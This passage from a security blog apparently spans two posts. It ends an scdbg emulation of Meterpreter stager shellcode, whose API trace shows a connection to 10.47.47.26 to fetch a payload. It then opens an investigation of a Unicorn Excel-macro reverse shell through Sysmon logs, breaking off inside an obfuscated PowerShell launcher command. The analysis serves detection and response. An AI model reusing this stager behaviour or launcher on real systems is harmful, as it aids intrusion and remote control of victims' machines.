style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2a READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2b READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2c READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2d READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd2e READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd20 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd21 READ</span><br /><span style="font-family: courier;">40104e mdll msvcrt> lodsb 77c5cd22 READ</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Stepcount 444651</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Analysis report:</span><br /><span style="font-family: courier;"> Reads of Dll memory detected (use -mdll for details)</span><br /><span style="font-family: courier;"> Uses peb.InMemoryOrder List</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Signatures Found: None</span><br /><font face="courier"><br /></font><span style="font-family: courier;">Memory Monitor Log:</span><br /><span style="font-family: courier;"> *PEB (fs30) accessed at 0x40100a</span><br /></font><div style="text-align: left;"><font face="courier" size="2"> peb.InMemoryOrderModuleList accessed at 0x401011</font></div><div><font face="courier" size="1"></font></div></div><div><br /></div><div>Above we can see bytes are being read from sequential memory addresses. <font face="courier">scdbg </font>tells us this is a dll, specifically the Microsoft Visual C Run Time library. </div><div><br /></div><div>In the <font face="courier">Analysis report</font> and <font face="courier">Memory Monitor Log</font> sections of the output, we also see mentions of the shellocde using the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb" target="_blank">PEB (Process Environment Block)</a>, specifically the <a href="https://docs.microsoft.com/en-us/windows/win32/api/winternl/ns-winternl-peb_ldr_data" target="_blank"><font face="courier">InMemoryOrderModuleList</font></a>. I wasn't certain what this was about, but assumed it had something to do with the shellcode attempting to locate specific functions in some loaded module. This was confirmed by an old post from <a href="https://twitter.com/stephenfewer" target="_blank">Stephen Fewer</a> of <a href="https://web.archive.org/web/20171021140810/blog.harmonysecurity.com/2009_06_01_archive.html" target="_blank">Harmony Security back in June of 2009</a>. I'm grateful for <a href="http://archive.org" target="_blank">archive.org</a>. (Gratitude is great, but generosity is better. Donate to <a href="https://archive.org/donate/" target="_blank">archive.org</a>)</div><div><br /></div><div>Given the info in Fewer's post, I wondered if I could run <font face="courier">scdbg</font> with the right arguments to see the code referencing the <font face="courier">InMemoryOrderModuleList</font>. Turns out, yes. The first one happens around step 10 and it happens six more times in the first 2.6 millions steps:</div><div><span style="font-family: courier; font-size: x-small;"><br /></span></div><div><div><font face="courier" size="1"></font></div><span style="font-family: courier; font-size: x-small;">PS> scdbg.exe -v -s 2550000 -f shellcode.bin | select-string 'fs:\[' -Context 2,2</span><br /><font face="courier" size="1"><br /></font><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="color: red; font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30] step: 10</span><br /><span style="color: red; font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="color: red; font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30] step: 178605</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 718215</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 1262515</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc] step: 1809940</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 2357005</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><span style="font-family: courier; font-size: x-small;"> 401011 8B5214 mov edx,[edx+0x14]</span><br /><span style="font-family: courier; font-size: x-small;"> 401006 89E5 mov ebp,esp step: 2506045</span><br /><span style="font-family: courier; font-size: x-small;"> 401008 31C0 xor eax,eax</span><br /><span style="font-family: courier; font-size: x-small;">> 40100a 648B5030 mov edx,fs:[eax+0x30]</span><br /><span style="font-family: courier; font-size: x-small;"> 40100e 8B520C mov edx,[edx+0xc]</span><br /><div style="text-align: left;"><font face="courier" size="1"> 401011 8B5214 mov edx,[edx+0x14]</font></div><div><font face="courier" size="1"></font></div></div><h3 style="text-align: left;">What have we learned?</h3><div>Probably the most important pieces of information were gleaned in the early goings. This <font face="courier">scdbg</font> command tells us the API calls made during the first 5+ million steps.</div><div><span style="font-family: courier; font-size: small;"><br /></span></div><div><div><font face="courier" size="2"></font></div><span style="font-family: courier; font-size: small;">PS> scdbg.exe -s 54465000 -api -f .\shellcode.bin -nc</span><br /><span style="font-family: courier; font-size: small;">Loaded 296 bytes from file .\shellcode.bin</span><br /><span style="font-family: courier; font-size: small;">Detected straight hex encoding input format converting...</span><br /><span style="font-family: courier; font-size: small;">Initialization Complete..</span><br /><span style="font-family: courier; font-size: small;">Max Steps: 54465000</span><br /><span style="font-family: courier; font-size: small;">Using base offset: 0x401000</span><br /><font face="courier" size="2"><br /></font><span style="font-family: courier; font-size: small;">40109a LoadLibraryA(wininet)</span><br /><span style="font-family: courier; font-size: small;">4010a8 InternetOpenA()</span><br /><span style="font-family: courier; font-size: small;">4010c4 InternetConnectA(server: 10.47.47.26, port: 80, )</span><br /><span style="font-family: courier; font-size: small;">4010d9 HttpOpenRequestA(path: /8Kh89, )</span><br /><span style="font-family: courier; font-size: small;">4010e9 HttpSendRequestA()</span><br /><span style="font-family: courier; font-size: small;">401117 VirtualAlloc(base=0 , sz=400000) = 600000</span><br /><div style="text-align: left;"><font face="courier" size="2">40112b InternetReadFile(4893, buf: 600000, size: 2000)</font></div><div style="text-align: left;"><font face="courier" size="2"><br /></font></div><div><font face="courier" size="2"></font></div></div><div>Combined with what we sorted out in the previous post, this paints a more complete picture. The calls above were in the shellcode. So we can say the shellcode opened a network connection to 10.47.47.26 via port 80, and this is consistent with what we say in the Sysmon logs. We didn't see the path, so we have a bit of new information, the request hit whatever resource was hosted at <font face="courier">/8Kh89</font>. Maybe that resource served up the payload that injected <font face="courier">metsrv.dll</font><font face="inherit"> </font>and the other injected dlls. We've learned more, but there are still some unanswered questions. Maybe we'll revisit those in a future post.</div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><br /></div><div><div style="color: #d4d4d4; font-family: menlo, monaco, "courier new", monospace; font-size: 12px; white-space: pre;"><br /></div></div>davehullhttp://www.blogger.com/profile/13189230083815485114noreply@blogger.com0tag:blogger.com,1999:blog-3580686762080119284.post-1136237144994735342020-07-21T13:51:00.004-07:002020-07-27T11:43:16.459-07:00Meterpreter's Migrate: Detection and Investigation with memtriage and memdumppeIf you're fortunate enough to be running a modern endpoint detection and response (EDR) product or even endpoint protection (EPP), you may be in good shape for detecting or blocking things like <a href="https://github.com/rapid7/metasploit-framework/" target="_blank">Metasploit</a>'s <a href="https://github.com/rapid7/metasploit-payloads" target="_blank">Meterpreter payload</a>. Meterpreter's capabilities have been emulated by other frameworks and malware. While there are more sophisticated attack tools available, testing detections and investigating Meterpreter is still a valuable exercise.<div><br /></div><div>In this post, we'll take a look at a typical scenario involving a malicious Excel macro created using <a href="https://github.com/trustedsec/unicorn" target="_blank">TrustedSec's Unicorn</a> that spawns a Meterpreter reverse shell that connects back to a listener on an endpoint running Metasploit. We'll review some of the data that <a href="https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon" target="_blank">Sysmon</a> captures using a <a href="https://github.com/SwiftOnSecurity/sysmon-config" target="_blank">popular Sysmon configuration</a> from Internet infosec celeb <a href="https://twitter.com/SwiftOnSecurity" target="_blank">SwiftOnSecurity</a>.</div><div><br /></div><div>After seeing what Sysmon captures, we'll grab <a href="https://twitter.com/gleeda" target="_blank">gleeda's</a> <a href="https://github.com/gleeda/memtriage" target="_blank">memtriage</a> to take a deeper look. If you're not familiar with memtriage, you really should check it out as it enables investigators to run more than two dozen <a href="https://github.com/volatilityfoundation/volatility" target="_blank">Volatility</a> plugins against an endpoint while it is up and running. Years ago I was working in an environment with hundreds of thousands of servers strewn across data centers worldwide often with 192GB of RAM. Imagine trying to take a memory dump from one of those systems to run an investigation to ground. Having something like memtriage would have made investigations easier.</div><h2 style="text-align: left;">Let's play: Sysmon Says</h2><div>Our unsuspecting user has opened an Excel spreadsheet containing a malicious macro as outlined above. Unbeknownst to the user, this has caused a reverse shell to call back to a listener on a remote system where the attacker used Meterpreter's <a href="https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/post/meterpreter/extensions/priv/priv.rb" target="_blank">priv extension</a> to call <font face="courier">getsystem</font>, elevating the attacker's privileges to SYSTEM on the victim machine, which then enable's the attacker to <a href="https://github.com/rapid7/metasploit-framework/blob/5e65021914e28bbc929fdc010143d012688f75ca/modules/post/windows/manage/migrate.rb" target="_blank"><font face="courier">migrate</font></a> their malicious agent into to a legitimate process on the machine -- <font face="courier">spoolsv.exe</font> -- using <a href="https://github.com/rapid7/metasploit-framework/tree/76954957c740525cff2db5a60bcf936b4ee06c42/external/source/shellcode/windows/x64/src/migrate" target="_blank">code that's been around for at least a decade</a>. Following the migration to <font face="courier">spoolsv.exe</font>, the attacker ran <a href="https://github.com/rapid7/metasploit-framework/blob/76954957c740525cff2db5a60bcf936b4ee06c42/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb" target="_blank">hashdump</a>.</div><div><br /></div><div>Here's some of what Sysmon logged:</div><div><br /></div><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Log Name:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon/Operational</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Source:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:07 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Event ID:<span class="Apple-converted-space"> </span>1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Task Category: Process Create (rule: ProcessCreate)</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:07.410</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a6fb-5f14-437f-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 2476</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 16.0.11929.20838</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Microsoft Excel</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft Office</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: Excel.exe</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: "C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE"<span class="Apple-converted-space"> </span></font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">CurrentDirectory: C:\Windows\system32\</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">User: 1011LABS\dave.hull</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonGuid: {fc3f293c-4e60-5f14-ee7e-3b0000000000}</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">LogonId: 0x3B7EEE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">TerminalSessionId: 1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">IntegrityLevel: High</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#f4f4f4">Hashes: </font><font color="#04ff00">MD5=B0560334F0AFC1EEB1C1F67FD27ED79E,SHA256=477D98352D14E8A65C79A4A68112EBB92E03358708E7B04E9411831A2F0EA5E8,IMPHASH=9AE6B99DE4CEC4B19FFAFF4B2AA4C4E4</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessGuid: {fc3f293c-4e61-5f14-3d9a-3b0000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentProcessId: 2344</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentImage: C:\Windows\explorer.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ParentCommandLine: C:\Windows\Explorer.EXE</font></span></p></div><div><br /></div><div>Above Sysmon has logged an Event Id 1 or process creation event, for the Excel process. We get the creation time, hostname, user context, parent process Id and name and GUIDs for this process and its parent. These globally unique identifiers are created by Sysmon to make tracking parent and child process relationships easier as process Ids alone can make this difficult due to the reuse of process Ids. There's some other useful thing, hashes of the process and the imphash or the hash of the process' import table.</div><div><br /></div><div>So far, nothing unusual to see here. Next up, things take a turn.</div><h2 style="text-align: left;">A PowerShell Excursion:</h2><div><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Log Name:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon/Operational</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Source:<span class="Apple-converted-space"> </span>Microsoft-Windows-Sysmon</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Date:<span class="Apple-converted-space"> </span>7/19/2020 8:03:34 PM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Event ID:<span class="Apple-converted-space"> </span>1</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Task Category: Process Create (rule: ProcessCreate)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Level: <span class="Apple-converted-space"> </span>Information</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Keywords: <span class="Apple-converted-space"> </span></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">User:<span class="Apple-converted-space"> </span>SYSTEM</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Computer:<span class="Apple-converted-space"> </span>wins2012r202.1011Labs.com</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process Create:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">RuleName: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">UtcTime: 2020-07-19 20:03:34.614</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessGuid: {fc3f293c-a716-5f14-06ce-430000000000}</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">ProcessId: 1604</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">FileVersion: 10.0.14409.1005 (rs1_srvoob.161208-1155)</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Description: Windows PowerShell</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Product: Microsoft® Windows® Operating System</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Company: Microsoft Corporation</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">OriginalFileName: PowerShell.EXE</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe<span class="Apple-converted-space"> </span>/w 1 /C "sv BvI -;sv AT ec;sv Al ((gv BvI).value.toString()+(gv AT).value.toString());powershell 